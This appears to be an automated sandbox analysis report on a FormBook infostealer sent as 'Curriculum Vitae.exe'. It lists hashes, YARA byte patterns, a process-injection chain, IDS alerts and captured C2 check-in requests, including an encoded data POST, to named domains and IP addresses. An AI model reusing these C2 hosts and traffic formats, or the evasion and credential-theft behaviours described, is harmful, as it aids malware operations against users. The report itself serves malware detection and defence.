Windows Analysis Report
Curriculum Vitae.exe

Overview

General Information

Sample name: Curriculum Vitae.exe
Analysis ID: 1501087
MD5: eda3b2c20013e6a58d10ad852d39fd29
SHA1: 56ff3fdfee53f3e37c14cf10bc3d4044535a9da0
SHA256: 291ca7bba147041963c8d17b3504981dd2eb595945e7472d5e3e62d78f0fd6a7
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Curriculum Vitae.exe (PID: 6772 cmdline: "C:\Users\user\Desktop\Curriculum Vitae.exe" MD5: EDA3B2C20013E6A58D10AD852D39FD29)
    • svchost.exe (PID: 1632 cmdline: "C:\Users\user\Desktop\Curriculum Vitae.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • OAIexgManRWDie.exe (PID: 5776 cmdline: "C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regsvr32.exe (PID: 7064 cmdline: "C:\Windows\SysWOW64\regsvr32.exe" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
          • OAIexgManRWDie.exe (PID: 6584 cmdline: "C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5324 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

Source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

Source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

(11 entries in total; only the first are shown)

Source: 2.2.svchost.exe.400000.0.unpack
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

Source: 2.2.svchost.exe.400000.0.unpack
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x2def3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x160a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 2.2.svchost.exe.400000.0.raw.unpack
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

Source: 2.2.svchost.exe.400000.0.raw.unpack
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x2ecf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16ea2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\Curriculum Vitae.exe", CommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", ParentImage: C:\Users\user\Desktop\Curriculum Vitae.exe, ParentProcessId: 6772, ParentProcessName: Curriculum Vitae.exe, ProcessCommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", ProcessId: 1632, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\Curriculum Vitae.exe", CommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", ParentImage: C:\Users\user\Desktop\Curriculum Vitae.exe, ParentProcessId: 6772, ParentProcessName: Curriculum Vitae.exe, ProcessCommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", ProcessId: 1632, ProcessName: svchost.exe
Timestamp                        SID      Severity  Source Port  Destination Port  Protocol  Classtype
2024-08-29T12:15:39.466977+0200  2855465  1         55084        80                TCP       A Network Trojan was detected
2024-08-29T12:16:13.543047+0200  2855464  1         55091        80                TCP       A Network Trojan was detected
2024-08-29T12:16:22.860493+0200  2855464  1         55093        80                TCP       A Network Trojan was detected
2024-08-29T12:14:18.641798+0200  2855464  1         55095        80                TCP       A Network Trojan was detected
2024-08-29T12:15:57.839714+0200  2855464  1         55086        80                TCP       A Network Trojan was detected
2024-08-29T12:16:00.487795+0200  2855464  1         55087        80                TCP       A Network Trojan was detected
2024-08-29T12:15:55.290457+0200  2855464  1         55085        80                TCP       A Network Trojan was detected
2024-08-29T12:16:08.467911+0200  2855464  1         55089        80                TCP       A Network Trojan was detected
2024-08-29T12:16:11.027129+0200  2855464  1         55090        80                TCP       A Network Trojan was detected
2024-08-29T12:16:16.092689+0200  2855465  1         55092        80                TCP       A Network Trojan was detected
2024-08-29T12:16:25.407496+0200  2855464  1         55094        80                TCP       A Network Trojan was detected
2024-08-29T12:16:02.916430+0200  2855465  1         55088        80                TCP       A Network Trojan was detected

AV Detection

Source: Curriculum Vitae.exe, ReversingLabs: Detection: 65%
Source: Curriculum Vitae.exe, Virustotal: Detection: 60%
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Curriculum Vitae.exe, Joe Sandbox ML: detected
Source: Curriculum Vitae.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OAIexgManRWDie.exe, 00000005.00000002.3269982810.0000000000E9E000.00000002.00000001.01000000.00000005.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270006592.0000000000E9E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: Curriculum Vitae.exe, 00000000.00000003.2110503181.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Curriculum Vitae.exe, 00000000.00000003.2109991860.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564850998.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562563965.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2666154415.000000000480C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2668247041.00000000049B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Curriculum Vitae.exe, 00000000.00000003.2110503181.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Curriculum Vitae.exe, 00000000.00000003.2109991860.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2564850998.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562563965.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 00000006.00000002.3270855352.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2666154415.000000000480C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2668247041.00000000049B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: regsvr32.pdb source: svchost.exe, 00000002.00000002.2666122437.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2633856083.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3269624546.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000003.2611854418.000000000080B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: regsvr32.pdbGCTL source: svchost.exe, 00000002.00000002.2666122437.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2633856083.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3269624546.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000003.2611854418.000000000080B000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Curriculum Vitae.exe, Code function: 0_2_00D9DBBE: lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Curriculum Vitae.exe, Code function: 0_2_00D6C2A2: FindFirstFileExW
Source: C:\Users\user\Desktop\Curriculum Vitae.exe, Code function: 0_2_00DA68EE: FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Curriculum Vitae.exe, Code function: 0_2_00DA698F: FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\Curriculum Vitae.exe, Code function: 0_2_00D9D076: FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Curriculum Vitae.exe, Code function: 0_2_00D9D3A9: FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Curriculum Vitae.exe, Code function: 0_2_00DA9642: SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Curriculum Vitae.exe, Code function: 0_2_00DA979D: SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Curriculum Vitae.exe, Code function: 0_2_00DA9B2B: FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Curriculum Vitae.exe, Code function: 0_2_00DA5C97: FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_0293C270: FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_02929A90: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_02942391: 4x nop then pop edi
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_048B04DF: 4x nop then mov ebx, 00000004h

Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55086 -> 195.110.124.133:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55090 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55085 -> 195.110.124.133:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:55092 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55091 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55089 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:55084 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55087 -> 195.110.124.133:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:55088 -> 195.110.124.133:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55094 -> 66.81.203.200:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55093 -> 66.81.203.200:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55095 -> 66.81.203.200:80
Source: Joe Sandbox View, IP Address: 195.110.124.133
Source: Joe Sandbox View, IP Address: 188.114.96.3
Source: Joe Sandbox View, IP Address: 188.114.96.3
Source: Joe Sandbox View, ASN Name: REGISTER-ASIT
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: NTT-LT-ASLT
Source: Joe Sandbox View, ASN Name: CONFLUENCE-NETWORK-INCVG
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Curriculum Vitae.exe, Code function: 0_2_00DACE44: InternetReadFile,SetEvent,GetLastError,SetEvent
Source: global traffic, HTTP traffic detected:
  GET /zt7d/?QpGDsvFp=KcI7zOUatYggDJ3AV9ydt+9IOITQmx5DA5xygALe8uDfsJvPSx2pTS8MbER0fEeW+0g1hrhWUIgkLG8bo3rrAlPfGKh0dC1LPhQcHC1DvDFG/ug/vgNVnHXaPgixFLXzAw==&en=KRMtj8Zx1f- HTTP/1.1
  Host: www.chinaen.org
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
Source: global traffic, HTTP traffic detected:
  GET /6u21/?QpGDsvFp=aL/4TjGztHWcUB/Ah5XMbJsPVjcLX5spIqygDBReB+gjFi+JNHxT0K0F5MtDhvjmRAZ0VF/vQduwy3cjjhNQXD5C3/i7fPsqWYlJ4opKyF5MG7GdSMwyyOQYqJ9RHJTdWA==&en=KRMtj8Zx1f- HTTP/1.1
  Host: www.marcoiozia.info
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
Source: global traffic, HTTP traffic detected:
  GET /2b9b/?QpGDsvFp=ZHAZUszVkZojOh6l4QgRWsOseo6gnr5+/9v7uoYYl6Pb3zYSipzXXNStKfhRGhUQf6Tergy2VCT+UWp4uEi/6TdO8TzwggtBmSoW3KZOjFFDDhjE/y85QqgGs38SMRVr8g==&en=KRMtj8Zx1f- HTTP/1.1
  Host: www.godoggyonbase.online
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
Source: global traffic, DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic, DNS traffic detected: DNS query: www.chinaen.org
Source: global traffic, DNS traffic detected: DNS query: www.marcoiozia.info
Source: global traffic, DNS traffic detected: DNS query: www.godoggyonbase.online
Source: global traffic, DNS traffic detected: DNS query: www.mediaplug.biz
Source: unknown, HTTP traffic detected:
  POST /6u21/ HTTP/1.1
  Host: www.marcoiozia.info
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate, br
  Origin: http://www.marcoiozia.info
  Cache-Control: max-age=0
  Content-Length: 209
  Content-Type: application/x-www-form-urlencoded
  Connection: close
  Referer: http://www.marcoiozia.info/6u21/
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
  Data Raw: 51 70 47 44 73 76 46 70 3d 58 4a 58 59 51 55 57 2b 6a 47 2b 2b 62 77 57 72 6e 4b 62 51 65 72 51 44 63 7a 77 30 66 4c 77 71 4c 2b 43 64 44 77 77 45 4b 59 46 50 4a 42 43 49 4e 6b 49 79 32 49 59 71 38 39 4e 45 68 74 62 30 55 54 73 6f 62 6e 44 64 56 39 32 58 74 47 41 5a 78 44 64 6a 64 44 70 59 67 34 2b 66 4e 76 77 51 54 2b 35 70 73 4f 4e 58 73 6b 78 6a 43 2b 32 63 54 62 34 75 37 2f 30 48 71 2b 42 4e 64 4d 57 53 4a 38 4a 39 30 49 75 78 77 35 4f 75 61 2b 6d 6e 7a 6a 78 31 35 75 35 64 75 6c 6b 33 66 43 58 33 38 46 41 74 49 72 33 6b 4a 2b 66 53 59 77 58 44 68 39 33 77 33 6c 39 2b 36 57 4d 4f 6f 35 78 78 33 4f 52 5a 73 2f 63 3d
  Data Ascii: QpGDsvFp=XJXYQUW+jG++bwWrnKbQerQDczw0fLwqL+CdDwwEKYFPJBCINkIy2IYq89NEhtb0UTsobnDdV92XtGAZxDdjdDpYg4+fNvwQT+5psONXskxjC+2cTb4u7/0Hq+BNdMWSJ8J90Iuxw5Oua+mnzjx15u5dulk3fCX38FAtIr3kJ+fSYwXDh93w3l9+6WMOo5xx3ORZs/c=
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 29 Aug 2024 10:15:39 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  Product: Z-BlogPHP 1.7.3
  X-XSS-Protection: 1; mode=block
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrAgzzFouJWtkbC1qarmqV8q4bD9HMroakga3SKJfMkUVYL3CIxfboisvzOEs1LNVf5JC6ULuYJ%2FqsJfM%2FxFQFbwzR1cAkz1EUxzW5oXVEQi%2FjD1XlMD2jF1aSYg3KdVk%2BE%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8babc7f3ee497ce2-EWR
  alt-svc: h3=":443"; ma=86400
  Data Raw: 31 64 31 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 21 20 e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e9 a1 b5 e9 9d a2 e6 9c aa e6 89 be e5 88 b0 20 2d 20 e7 8e 8b e8 80 85 e8 8d a3 e8 80 80 e6 94 bb e7 95 a5 e4 b9 8b e5 ae b6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31 31 32 35 66 72 65 65 2f 73 74 79 6c 65 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31 31 32 35 66 72 65 65 2f 73 74 79 6c 65 2f 63 73 73 2f 73 77 69 70 65 72 2d
  Data Ascii: 1d1b<!doctype html><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device"content="pc,mobile"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><title>404! - </title><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css" rel="stylesheet"><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 29 Aug 2024 10:15:55 GMT
  Server: Apache
  Content-Length: 203
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 29 Aug 2024 10:15:57 GMT
  Server: Apache
  Content-Length: 203
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
